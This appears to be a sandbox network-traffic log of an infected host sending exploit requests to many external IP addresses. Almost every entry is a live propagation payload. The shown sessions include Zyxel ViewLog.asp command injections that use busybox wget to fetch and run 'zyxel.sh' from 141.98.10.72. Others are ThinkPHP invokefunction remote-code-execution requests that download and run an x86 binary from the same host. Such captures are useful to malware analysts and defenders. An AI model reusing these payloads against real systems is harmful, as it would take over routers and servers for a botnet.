Feb 14, 2024 09:30:07.513134956 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:19.544780970 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:45.399967909 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:34.550806999 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
467	192.168.2.15	39596	31.136.238.186	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:58.407536983 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:01.625186920 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:07.769144058 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:19.800723076 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:45.399954081 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:34.550718069 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
468	192.168.2.15	51494	31.136.255.43	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:58.409009933 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:01.625179052 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:07.769150972 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:19.800702095 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:45.399952888 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:34.550674915 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
469	192.168.2.15	50522	94.122.107.233	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:58.858814001 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
470	192.168.2.15	46656	85.133.222.44	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:58.893605947 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
471	192.168.2.15	53986	94.187.234.215	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:58.924550056 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:59.265953064 CET	21	IN	HTTP/1.1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
472	192.168.2.15	54102	94.122.24.173	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:59.442934990 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
473	192.168.2.15	51726	94.120.102.94	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:59.443073034 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
474	192.168.2.15	48532	94.111.253.204	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:59.626667976 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
475	192.168.2.15	38402	62.29.127.191	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:59.660171986 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
476	192.168.2.15	55042	94.123.126.165	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:59.660303116 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
477	192.168.2.15	52578	94.187.235.96	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:59.756983995 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
478	192.168.2.15	51042	88.216.129.122	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:00.863591909 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:00.982633114 CET	501	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:04 GMT Server: Apache/2.4.54 (Debian) Content-Length: 307 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 36 35 2e 31 39 36 2e 31 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.54 (Debian) Server at 107.165.196.135 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
479	192.168.2.15	55164	88.221.226.64	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:00.960732937 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:01.177041054 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:01 GMT Date: Wed, 14 Feb 2024 08:30:01 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 64 39 62 31 37 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 30 31 26 23 34 36 3b 31 65 34 37 36 31 31 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.ad9b1702.1707899401.1e47611a</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
480	192.168.2.15	50630	88.63.12.223	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:00.971656084 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:01.201355934 CET	89	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 45 72 72 6f 72 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 3c Data Ascii: <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY><H1>404 Not Found</H1><HR></BODY></HTML>
Feb 14, 2024 09:30:04.343911886 CET	89	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 45 72 72 6f 72 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 3c Data Ascii: <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY><H1>404 Not Found</H1><HR></BODY></HTML>
Feb 14, 2024 09:30:10.343949080 CET	89	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 45 72 72 6f 72 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 3c Data Ascii: <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY><H1>404 Not Found</H1><HR></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
481	192.168.2.15	39632	94.140.0.209	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:01.216727972 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
482	192.168.2.15	57448	31.208.62.78	8080

Timestamp	Bytes transferred	Direction	Data
